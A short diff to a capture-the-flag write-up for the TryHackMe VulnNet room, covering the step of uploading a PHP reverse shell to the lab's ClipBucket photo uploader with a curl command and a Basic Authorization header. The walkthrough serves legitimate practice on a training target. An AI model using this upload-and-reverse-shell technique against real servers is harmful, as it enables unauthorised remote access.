DhilipSanjay/CTFs/TryHackMe/VulnNet.md

 ### Upload Reverse Shell

 - Copy the `php-reverse-shell.php` and change the IP address and Port.
-- Now upload using the exploit code, just change the file name alone
+- Now upload using the exploit code (just change the file name and Authorization header)
+- **P.S**: This authorization header is for accessing `http://broadcast.vulnnet.thm`.
+It's not the authorization for clipbucket.

 ```bash
 $ curl -F "file=@reverse.php" -F "plupload=1" -F "name=reverse.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php" -H "Authorization: Basic REDACTED"